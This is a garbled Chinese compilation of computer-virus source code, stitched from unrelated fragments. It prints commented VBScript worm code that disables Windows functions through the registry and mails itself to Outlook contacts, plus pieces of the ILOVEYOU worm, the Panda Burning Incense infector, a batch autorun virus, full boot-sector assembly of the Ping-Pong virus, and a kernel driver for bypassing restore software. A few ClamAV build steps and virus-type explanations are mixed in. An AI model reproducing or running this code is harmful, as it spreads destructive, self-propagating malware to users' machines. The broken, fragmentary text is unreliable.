病毒源码

合集下载

电脑病毒源代码介绍

电脑病毒源代码介绍电脑中了病毒想从它的源代码入手怎么办呢!有店铺在，下面由店铺给你做出详细的电脑病毒源代码介绍!希望对你有帮助!电脑病毒源代码介绍：电脑病毒源代码一：on error resume nextset fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置set so=createobject("ing.filesystemobject"dim r '定义一个变量set r=createobject("w.shell"so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '复制病毒副本到system32/system文件夹位置so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单'下面是对注册表的恶意修改和简单的依靠oe传播r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单r.regwrite"kcu\software\microsoft\windows\currentversion\policies\explo rer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\syst em\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑r.regwrite"hklm\software\microsoft\windows\currentversion\run\scanregi stry","" '修改注册表，禁止开机注册表扫描r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\win oldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式r.regwrite"hklm\software\microsoft\windows\currentversion\run\win32sy stem","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\win oldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单电脑病毒源代码二：r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\expl orer\nosetfolders",1,"reg_dword" '修改注册表，禁止控制面板r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表，禁止导入使用.reg文件，改为用txt文件的关联r.regwrite"hklm\software\microsoft\windows\currentversion\winlogon\le galnoticecaption","警告" '设置开机提示框标题r.regwrite"hklm\software\microsoft\windows\currentversion\winlogon\le galnoticetext","您中vbs脚本病毒了，哭吧~" '设置开机提示框文本内容set ol=createobject("outlook.application" '创建outlook文件对象用于传播on error resume nextfor x=1 to 100set mail=ol.createitem(0)mail.to=ol.getnamespace("mapi".addresslists(1).addressentr ies(x) '用于向地址簿的前100名发送此vbs病毒，可以算是简单弱智的蠕虫了吧~~mail.subject="今晚你来吗?" '邮件主题mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。

电脑病毒危害大全有哪些

电脑病毒危害大全有哪些电脑病毒危害一：电脑病毒(1)源码型病毒这类病毒在高级语言(如fortan、c、pascal等语言)编写的程序被编译之前，插人列源程序之中，经编译成为合法程序的一部分。

这类病毒程序一般寄生在编译处理程序或链接程序中。

目前，这种病毒并不多见。

电脑病毒(2)可执行文件感染病毒这类病毒感染可执行程序，将病毒代码和可执行程序联系起来，当可执行程序被执行的时候，病毒随之启动。

感染可执行文件的病毒从技术上也可分为嵌人型和外壳型两种。

嵌人型病毒在感染时往往对宿主程序进行一定的修改，通常是寻找宿主程序的空隙将自己嵌人进去，并变为合法程序的一部分，使病毒程序与目标程序成为一体，这类病毒编写起来很难要求病毒能自动在感染目标程序中寻找恰当的位置，把自身插人，同时还要保证病毒能正常实施攻击，且感染的目标程序能正常运行。

一旦病毒侵人宿主程序，对其杀毒是十分困难的清除这类病毒时往往会破坏合法程序。

这类病毒的数量不多，但破坏力极大，而且很难检测，有时即使査出病毒并将其清除，但被感染的程序也被破坏，无法使用了。

外壳型病毒一般链接在宿主程序的首尾，对原来的主程序不作修改或仅作简单修改。

当宿主程序执行时首先执行并激活病毒程序，使病毒得以感染、繁衍和发作。

这类病毒易于编写，数量也最多。

(3)操作系统型病毒这类病毒程序用自己的逻辑部分取代一部分操作系统中的合法程序模块，从而寄生在计算机磁盘的操作系统区，在启动计算机时，能够先运行病毒程序，然后再运行启动程序，这类病毒可表现出很强的破坏力，可以使系统瘫痪，无法启动。

电脑病毒危害二：电脑病毒从本质上讲，它是一段电脑程序，,电脑病毒可分为以下几种，文件型病毒、系统型病毒和宏病毒。

1，文件型病毒：是一种驻留内存的病毒。

,主要感染可执行文件，在运行染有此类病毒的可执行文件时，驻留内存，并伺机传染或进行破坏。

2，系统型病毒：是一个破坏性极强的病毒，它是通过篡改磁盘上的系统区的内容来进行传染和破坏的。

clamav源码编译

clamav源码编译ClamAV是一种开源的防病毒软件，可以用来检测和清除恶意软件。

以下是ClamAV源码的编译过程：1. 下载ClamAV源码包。

可以通过ClamAV官方网站或其他可靠的软件下载网站下载。

2. 解压源码包。

使用解压工具（如WinRAR）将下载的源码包解压到指定的目录中。

3. 安装编译所需的依赖项。

ClamAV编译过程中需要一些依赖库和工具，在命令行中使用适合你的操作系统的包管理器（例如apt-get、yum等）安装这些依赖项。

4. 打开命令行终端。

进入到你解压源码包的目录。

5. 执行配置命令。

在终端中输入以下命令配置编译环境：```shell./configure```如果你需要特定的配置选项，可以使用`--help`参数查看可用的选项，并使用`--with-option`进行配置。

6. 执行make命令进行编译。

在终端中输入以下命令开始编译：```shellmake```这个过程可能会需要一些时间，请耐心等待。

7. 执行make install命令进行安装。

编译完成后，在终端中输入以下命令进行安装：```shellmake install```如果没有权限执行该命令，请使用管理员权限或使用sudo命令。

8. 配置ClamAV。

在安装完成后，你需要配置ClamAV以使其适应你的需求。

可以修改配置文件（通常位于/etc/clamav/clamd.conf）来设置ClamAV的各种选项，如扫描目录、扫描模式等。

9. 更新病毒定义数据库。

在终端中执行以下命令来更新ClamAV 的病毒定义数据库：```shellfreshclam```这将从ClamAV官方服务器下载最新的病毒定义文件。

10. 启动ClamAV。

在终端中执行以下命令启动ClamAV扫描服务：```shellclamd```ClamAV将开始监视文件和目录进行病毒扫描。

这就是ClamAV源码编译的基本过程。

请根据你的需求和操作系统的不同进行相应的调整。

电脑病毒源代码详细介绍

电脑病毒源代码详细介绍电脑病毒源代码(也称源程序)，是指一系列人类可读的计算机语言指令。

下面由店铺给你做出详细的源代码详细介绍!希望对你有帮助!源代码详细介绍：在现代程序语言中，源代码可以是以书籍或者磁带的形式出现，但最为常用的格式是文本文件，这种典型格式的目的是为了编译出计算机程序。

计算机源代码的最终目的是将人类可读的文本翻译成为计算机可以执行的二进制指令，这种过程叫做编译，通过编译器完成。

源代码主要功用有如下2种作用：1、生成目标代码2、即计算机可以识别的代码。

对软件进行说明，即对软件的编写进行说明。

为数不少的初学者，甚至少数有经验的程序员都忽视软件说明的编写，因为这部分虽然不会在生成的程序中直接显示，也不参与编译。

但是说明对软件的学习、分享、维护和软件复用都有巨大的好处。

因此，书写软件说明在业界被认为是能创造优秀程序的良好习惯，一些公司也硬性规定必须书写。

需要指出的是，源代码的修改不能改变已经生成的目标代码。

如果需要目标代码做出相应的修改，必须重新编译。

熊猫烧香源代码：病毒源代码每句后有中文。

比如function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external'Kernel32.dll'; //函数声明varTmpFile: string;Si:? ?STARTUPINFO;Pi:? ?PROCESS_INFORMATION;IsJap:? ?Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9xResult := True;end;{ 在流之间复制 }注：注意电脑防护!不可胡来，以电脑安全为主!。

木马的源代码

end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or

VBS病毒代码

if(err>=1)then＇超时设置
timeover.RegWrite "HKEY——CURRENT——USER\Softwate\Microsoft\Windows Scripting Host\Settings\Timeout"0"REG_DWORD"
end if
set sm=CreateObject("WScript.Shell")
c.Copy(sysdir&"\Kernel32.vbs")＇将自己复制到system下
c.Copy(windir&"\Rundll32.vbs")＇将自己复制到windows下
c.Copy(sysdir&"\Table.htm.vbs")＇向system下再复制一个
regload()＇调用写注册表的模块
Set regedit=CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)＇判断文件是否存在的进程
On Error Resume Next
s=lcase(f1.neme)＇将文件路径小写
if(ext="vbs")then ＇如果后缀是vbs
set ap=filesys.OpenTextFile(f1.path2true)＇就以文本方式打开
ap.write vbscp＇将自己写入文件，达到感染的目的
ap.close＇关闭文件
next

熊猫烧香病毒源代码!!

try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节)，存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);

熊猫烧香(源代码)

(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示：{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了，开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码：RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现，但这是比较基本的编程实现。

通过把自身注册为服务进程，可以使自己随着系统的启动一起启动。

批处理病毒源代码

echo del %%windir%%\user.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echo del %%windir%%\temp.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
goto auto>nul 2>nul
:J:
set disk=K:>nul 2>nul
goto auto>nul 2>nul
:K:
set disk=L:>nul 2>nul
goto auto>nul 2>nul
: L:
cls
attrib +s +h +r %windir%\%~nx0 2>nul >nul
goto auto>nul 2>nul
: D:
set disk=E:>nul 2>nul
goto auto>nul 2>nul
:E:
set disk=F:>nul 2>nul
goto auto>nul 2>nul
:F:
set disk=G:>nul 2>nul
attrib +s +h +r %disk%\%~nx0 2>nul >nul
attrib +s +h +r %disk%\autorun.inf 2>nul >nul
cls
goto %disk%>nul 2>nul

小球病毒源代码

小球病毒的源代码cseg segmentassume cs:csegorg 7c00hmain proc far；0000:7c00————————-stav:jmp startdb 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00hdb 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh ；0000:7c1e————————-start:xor ax,axmov ss,axmov sp,7c00hmov ds,axmov ax,ds:[0413h]sub ax,0002hmov word ptr ds:[413h],axmov cl,06hshl ax,clsub ax,07c0h；7c37——————————————————-mov es,axmov si,7c00hmov di,simov cx,0100hrepzmovsw； mov cs,ax； push ax ；let the two line tocomplish ‘mov cs,ax‘； pop csjmp es:$+2；97c0:7c45————————————————————push cspop dscall comd1 ；7c4a；7c4a———————————comd1:xor ah,ahint 13and byte ptr [0:7df8h],80hmov bx,[0:7df9h]push cspop axsub ax,0020hmov es,axcall con2 ；7c9dmov bx,[0:7df9h]inc bxmov ax,0ffc0hmov es,axcall con2 ；7c9dxor ax,axmov [0:7df7h],almov ds,ax；7c75————————————————————-mov ax,[0:04ch]mov bx,[0:04eh]mov si,word ptr [0:7cd0h]mov word ptr[0:04ch],si ；7cd0 Need register in expression mov [0:04eh],cspush cspop dsmov [0:7d2ah],axmov [0:7d2ch],bxmov dl,[0:7df8h]jmp stav ；000:7c00h；7c98————————————————————————con1:mov ax,0301hjmp con21 ；7ca0；7c9d——————————————-con2:mov ax,0201h；7ca0————————————————-con21:xchg bx,axadd ax,[0:7c1ch]xor dx,dxdiv word ptr [0:7c18h]inc dlmov ch,dlxor dx,dxdiv word ptr [0:7c1ah]mov cl,06hshl ah,clor ah,chmov cx,axxchg ch,clmov dh,dlmov ax,bx；7cc3————————————————-con3:mov dl,[0:7df8h]mov bx,8000hint 13jnb emdpop ax；7ccf——————————————————- emd:ret；7cd0——————————————-push dspush espush axpush bxpush cxpush dxpush cspop dspush cspop es；7cda————————————————test byte ptr [0:7df7h],01hjnz go1 ；7d23cmp ah,02hjnz go1 ；7d23cmp [0:7df8h],dlmov [0:7df8h],dljnz go2 ；7d12；7cf0——————————————————xor ah,ahint 1ahtest dh,7fhjnz go3 ；7d03test dl,0f0hjnz go3 ；7d03push dxcall show ；7eb3pop dx；7d03——————————————go3:mov cx,dxsub dx,[0:7eb0h]mov [0:7eb0h],cxsub dx,+24hjbgo1 ；7d23；7d12————————————————————————————-go2:or byte ptr [0:7df7h],01hpush sipush dicall infect ；7d2e；7d1c————————————————-pop dipop siand byte ptr[0:7df7h],0feh；7d23————————————go1:pop dxpop cxpop dxpop axpop espop dsjmp dword ptr [cs:i13] ；c800:051a bios int 13h Illegal numberi13:dw 51ahdw 0c800h；7d2e——————————————————————————————- infect:mov ax,0201hmov dh, 00hmov cx,0001hcall con3 ；7cc3test byte ptr [0:7df8h],80hjzgo4 ；7d63mov si ,81behmov cx,0004h；7d46————————————————-loop1:cmp byte ptr [si+4],1jz go5 ；7d58cmp byte ptr[si+4],4jz go5 ；7d58add si,+10hloop loop1ret；7d58——————————————————————————go5:mov dx,[si]mov cx,[si+2]mov ax,0201hcall con3 ；7cc3；7d63——————————————-go4:mov si,8002hmov di,word ptr[0:7c02h] ；7c02mov cx,001chrepzmovsb；7d6e————————————————————————-have infected? cmp word ptr [0:81fch],1357hjnz go6 ；7d8bcmp byte ptr [0:81f8h],00hjnz go7 ；7d8amov ax,[0:81f5h]mov [0:7df5h],axmov si,[0:81f9h]jmp go8 ；7e92；7d8a——————————————————————————-go7:ret；——————————；7d8b————————————————————————————————- go6:cmp word ptr [0:800bh],0200hjnz go7 ；7d8acmp byte ptr[0:800dh],02hjb go7 ；7d8amov cx,[0:800eh]mov al,[0:8010h]cbwmul word ptr [0:8016h]add cx,axmov ax,0020hmul word ptr [0:8011h]add ax,01ffhmov bx,0200hdiv bxadd cx,axmov [0:7df5h],cxmov ax,[0:7c13h]sub ax,[0:7df5h]mov bl,[0:7c0dh]xor dx,dxxor bh,bhdiv bxinc axmov di,axand byte ptr[0:7df7h],0fbhcmp ax,0ff0hjbe go9 ；7de0or byte ptr [0:7df7h],04h；7de0——————————————-go9:mov si,0001hmov bx,[0:7c0eh]dec bxmov [0:7df3h],bxmov byte ptr [0:7eb2h],0fehjmp go10 ；7e00DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah；7e00————————————————- go10:inc word ptr [0:7df3h]mov bx,[0:7df3h]add byte ptr [0:7eb2h],02hcall con2 ；7c9djmp go11 ；7e4b；7e12————————————————————-go16:mov ax,0003htest byte ptr[0:7df7h],04hjz go12 ；7e1dinc ax；7e1d——————————————-go12:mul sishr ax,1sub ah,[0:7eb2h]mov bx,axcmp bx,01ffhjnbgo10 ；7e00mov dx,[bx+8000h]test byte ptr [0:7df7h],04hjnz go13 ；7e45mov cl,04htest si,0001hjz go14 ；7e42shr dx,cl；7e42————————————————————————go14:and dh,0fh；7e45————————————————-go13:test dx,0ffffhjz go15 ；7e51；7e4b————————————-go11:inc sicmp si ,dijbe go16 ；7e12ret；7e51————————————————-go15:mov dx,0fff7htest byte ptr [0:7df7h],04hjnz go17 ；7e68and dh ,0fhmov cl,04htest si,0001hjz go17 ；7e68shl dx,cl；7e68——————————————————————go17:or [bx+8000h],dxmov bx,[0:7df3h]call con1 ；7c98mov ax,sisub ax,0002hmov bl,[0:7c0dh]xor bh,bhmul bxadd ax,[0:7df5h]mov si,axmov bx,0000hcall con2 ；7c9dmov bx,siinc bxcall con1 ；7c98；7e92——————————go8:mov bx,simov [0:7df9h],sipush cspop axsub ax,0020hmov es,axcall con1 ；7c98；7ea2————————————————-push cspop axsub ax,0040hmov es,axmov bx,0000hcall con1 ；7c98ret；————————————————————————————————————————————-； 02 22nop；7eb3————————————————————————————————————- show:test byte ptr[0:7df7h],02jnz go18 ；7edeor byte ptr[0:7df7h],02 ；set showmarkmov ax,0000hmov ds,axmov ax,[0:020h]mov bx,[0:022h]lea si,new1cmov word ptr [0:020h],si ；7edf Need register in expressionmov [0:022h],cspush cspop dsmov [0:7fc9h],axmov [0:7fcbh],bx；7ede————————————-go18:ret；7edf————————————————————————————————————new1c:push dspush axpush bxpush cxpush dxpush cspop dsmov ah,0fhint 10hmov bl,blcmp bx,[0:7fd4h]jz go19 ；7f27mov [0:7fd4h],bxdec ahmov [0:7fd6h],ahmov ah,01hcmp bl,07hjnz go20 ；7f05dec ah；7f05——————————————————————————go20:cmp bl,04hjnb go21 ；7f0cdec ah；7f0c————————————————————-go21:mov [0:7fd3h],ahmov word ptr [0:7fcfh],0101hmov word ptr [0:7fd1h],0101hmov ah,03hpush dxmov dx,[0:7fcfh]jmp go22 ；7f4a；7f27——————————————————————————- go19:mov ah,03hint 10hint 10hpush dxmov ah,02hmov dx,[0:7ecfh] ；[7ECF] OR [7FCF]?int 10hmov ax,[0:7fcdh]cmp byte ptr [0:7fd3h],01hjnz go23 ；7f41mov ax,8307h；7f41————————————————————————-go23:mov bl,ahmov cx,0001hmov ah,09hint 10h；7f4a——————————————————————go22:mov cx,[0:7fd1h]cmp dh,00hjnzgo24 ；7f58xor ch,0ffhinc ch；7f58————————————————————————go24:cmp dh,18hjnzgo25 ；7f62xor ch,0ffhinc ch；7f62————————————————————-go25:cmp dl,00hjnz go26 ；7f6cxor cl,0ffhinc cl；7f6c——————————————————————-go26:cmp dl,[0:7fd6h]jnz go27 ；7f77xor cl,0ffhinc cl；7f77——————————————————-go27:cmp cx,[0:7fd1h]jnz go28 ；7f94mov ax,[0:7fcdh]and al,07hcmp al,03hjnz go29 ；7f8bxor ch,0ffhinc ch；7f8b——————————————————-go29:cmp al,05hjnz go28 ；7f94xor cl,0ffhinc cl；7f94——————————————————————————go28:add dl,cladd dh,chmov [0:7fd1h],cxmov [0:7fcfh],dxmov ah,02hint 10hmov [0:7fcdh],axmov bl,ahcmp byte ptr [0:7fd3h],01hjnz go30 ；7fb6mov bl,83h；7fb6————————————————————-go30:mov cx,0001hmov ax,0907hint 10hpop dxmov ah,02hint 10hpop dxpop cxpop bxpop axpop dsjmpdword ptr [cs:my] ；f000:fea5my: dw 0fea5hdw 0f000hDB 00h,03h,4BhDB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h；7fcd——————————-main endpcseg endsend stav。

木马程序开发技术：病毒源代码详解

⽊马程序开发技术：病毒源代码详解近年来，⿊客技术不断成熟起来，对⽹络安全造成了极⼤的威胁，⿊客的主要攻击⼿段之⼀，就是使⽤⽊马技术，渗透到对⽅的主机系统⾥，从⽽实现对远程操作⽬标主机。

其破坏⼒之⼤，是绝不容忽视的，⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢，下⾯我对⽊马进⾏源代码级的详细的分析，让我们对⽊马的开发技术做⼀次彻底的透视，从了解⽊马技术开始，更加安全的管理好⾃⼰的计算机。

1、⽊马程序的分类⽊马程序技术发展⾄今，已经经历了4代，第⼀代，即是简单的密码窃取，发送等，没有什么特别之处。

第⼆代⽊马，在技术上有了很⼤的进步，冰河可以说为是国内⽊马的典型代表之⼀。

第三代⽊马在数据传递技术上，⼜做了不⼩的改进，出现了ICMP等类型的⽊马，利⽤畸形报⽂传递数据，增加了查杀的难度。

第四代⽊马在进程隐藏⽅⾯，做了⼤的改动，采⽤了内核插⼊式的嵌⼊⽅式，利⽤远程插⼊线程技术，嵌⼊DLL线程。

或者挂接PSAPI,实现⽊马程序的隐藏，甚⾄在Windows NT/2000下，都达到了良好的隐藏效果。

相信，第五代⽊马很快也会被编制出来。

关于更详细的说明，可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。

2．⽊马程序的隐藏技术⽊马程序的服务器端，为了避免被发现，多数都要进⾏隐藏处理，下⾯让我们来看看⽊马是如何实现隐藏的。

说到隐藏，⾸先得先了解三个相关的概念：进程，线程和服务。

我简单的解释⼀下。

进程：⼀个正常的Windows应⽤程序，在运⾏之后，都会在系统之中产⽣⼀个进程，同时，每个进程，分别对应了⼀个不同的PID（Progress ID, 进程标识符）这个进程会被系统分配⼀个虚拟的内存空间地址段，⼀切相关的程序操作，都会在这个虚拟的空间中进⾏。

线程：⼀个进程，可以存在⼀个或多个线程，线程之间同步执⾏多种操作，⼀般地，线程之间是相互独⽴的，当⼀个线程发⽣错误的时候，并不⼀定会导致整个进程的崩溃。

qq病毒源码

WriteAddress(Address);
end;
end;
closefile(f);
end;
procedure tform1.WriteAddress(Address:string);
var
F:textfile;
S,Str:string;
CanWrite:boolean;
value:=notopad.exe;
RegSetvalueEx(Hk,ruin,0,REG_SZ,@value,8);
//设置开机自动运行ruin.exe
end;
procedure EncodeBASE64(Dest,Source:string);//这里是用两个字符串作为参数，也就两个文件的路径
{$R *.dfm}
function checkwinver:string;
var
OS :TOSVersionInfo;
begin
ZeroMemory(@OS,SizeOf(OS));
OS.dwOSVersionInfoSize:=SizeOf(OS);
GetVersionEx(OS);
Result:=XP;
end else begin
if (OS.dwMajorVersion=4) and (OS.dwMinorVersion=0) then begin
Result:=95;
if (Trim(OS.szCSDVersion)=B) then
Result:=952;
Path:array[0..255] of char;
begin
GetSystemDirectory(path,256);

机器狗病毒源码1(C语言)

//备注：获取文件在扇区的位置后，向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。

//编译时注意：FileSystemControl的数据结构需要自己添加。

#include<ntddk.h>#include<srb.h>#define FSCTL_GET_RETRIEV AL_POINTERS 0x90073#define PARTITION_TYPE_NTFS 0x07#define PARTITION_TYPE_FAT32 0x0B#define PARTITION_TYPE_FAT32_LBA 0x0Cextern POBJECT_TYPE* IoDriverObjectType;LARGE_INTEGER realdiskpos;ULONG sectorspercluster;typedef struct RETRIEV AL_POINTERS_BUFFER {ULONG ExtentCount;LARGE_INTEGER StartingVcn;struct {LARGE_INTEGER NextVcn;LARGE_INTEGER Lcn;} Extents[1];} RETRIEV AL_POINTERS_BUFFER, *PRETRIEV AL_POINTERS_BUFFER;typedef struct { LARGE_INTEGER StartingVcn;} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;typedef struct _SENSE_DATA {unsigned char Valid;unsigned char SegmentNumber;unsigned char FileMark;unsigned char Information[4];unsigned char AdditionalSenseLength;unsigned char CommandSpecificInformation[4];unsigned char AdditionalSenseCode;unsigned char AdditionalSenseCodeQualifier;unsigned char FieldReplaceableUnitCode;unsigned char SenseKeySpecific[3];} SENSE_DATA, *PSENSE_DATA;#pragma pack(1)typedef struct _PARTITION_ENTRY{UCHAR active;UCHAR StartHead;UCHAR StartSector;UCHAR StartCylinder;UCHAR PartitionType;UCHAR EndHead;UCHAR EndSector;UCHAR EndCylinder;ULONG StartLBA;ULONG TotalSector;} PARTITION_ENTRY, *PPARTITION_ENTRY;typedef struct _MBR_SECTOR{UCHAR BootCode[446]; PARTITION_ENTRY Partition[4];USHORT Signature;} MBR_SECTOR, *PMBR_SECTOR;typedef struct _BBR_SECTOR{USHORT JmpCode;UCHAR NopCode;UCHAR OEMName[8];USHORT BytesPerSector;UCHAR SectorsPerCluster;USHORT ReservedSectors;UCHAR NumberOfFATs;USHORT RootEntries;USHORT NumberOfSectors16;UCHAR MediaDescriptor;USHORT SectorsPerFAT16;USHORT SectorsPerTrack;USHORT HeadsPerCylinder;ULONG HiddenSectors;ULONG NumberOfSectors32;ULONG SectorsPerFAT32;} BBR_SECTOR, *PBBR_SECTOR;#pragma pack()typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2];PVOID Base;ULONG Size;ULONG Flags;USHORT Index;USHORT Unknown;USHORT LoadCount;USHORT ModuleNameOffset;CHAR ImageName[255];} SYSTEM_MODULE_INFORMA TION, *PSYSTEM_MODULE_INFORMA TION;NTSYSAPINTSTATUSNTAPIObReferenceObjectByName(IN PUNICODE_STRING ObjectName,IN ULONG Attributes,IN PACCESS_STA TE AccessState OPTIONAL,IN ACCESS_MASK DesiredAccess OPTIONAL,IN POBJECT_TYPE ObjectType,IN KPROCESSOR_MODE AccessMode,IN OUT PVOID ParseContext OPTIONAL,OUT PVOID* Object );NTSYSAPINTSTATUSNTAPIZwQuerySystemInformation(IN ULONG SystemInformationClass,IN OUT PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength);NTSTATUSIrpCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context){PMDL mdl;Irp->UserIosb->Status=Irp->IoStatus.Status;Irp->UserIosb->Information=Irp->rmation;if(! Context){mdl=Irp->MdlAddress;if(mdl){DbgPrint("read size: %d..", Irp->rmation);MmUnlockPages(mdl);IoFreeMdl(mdl);}}KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);IoFreeIrp(Irp);return STATUS_MORE_PROCESSING_REQUIRED;}NTSTATUS IrpCompletionRoutine_0(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context){PMDL mdl;Irp->UserIosb->Status=Irp->IoStatus.Status;Irp->UserIosb->Information=Irp->rmation;if (! Context ){mdl=Irp->MdlAddress;if ( mdl ){DbgPrint("read size: %d..", Irp->rmation);MmUnlockPages(mdl);IoFreeMdl(mdl);}}KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);IoFreeIrp(Irp);return STATUS_MORE_PROCESSING_REQUIRED;}ULONG GetModuleBase(char* name){ULONG n,i ;PSYSTEM_MODULE_INFORMA TION module;PVOID pbuftmp;char modulename[255];ZwQuerySystemInformation(11, &n, 0, &n);pbuftmp = ExAllocatePool(NonPagedPool, n);ZwQuerySystemInformation(11, pbuftmp, n, NULL);module = (PSYSTEM_MODULE_INFORMA TION)((PULONG )pbuftmp + 1 ); n = *((PULONG)pbuftmp );for ( i = 0; i < n; i++ ){strcpy(modulename,module.ImageName + module.ModuleNameOffset);if(!_strnicmp(modulename,name,strlen(name))){ExFreePool(pbuftmp);return (ULONG)module.Base;}}ExFreePool(pbuftmp);return 0;}NTSTATUS MyIoCallDriver(PDEVICE_OBJECT DeviceObject,PIRP Irp)//自己的IoCallDriver {PIO_STACK_LOCATION stack;--Irp->CurrentLocation;stack = IoGetNextIrpStackLocation( Irp );Irp->Tail.Overlay.CurrentStackLocation= stack;//移动堆栈stack->DeviceObject=DeviceObject;return(DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject, Irp);}ULONG AtapiReadWriteDisk(PDEVICE_OBJECT dev_object,ULONG MajorFunction, PVOID buffer,ULONG DiskPos, int BlockCount){NTSTATUS status;PSCSI_REQUEST_BLOCK srb;PSENSE_DATA sense;KEVENT Event;PIRP irp;PMDL mdl;IO_STATUS_BLOCK isb;PIO_STACK_LOCA TION isl;PVOID psense;int 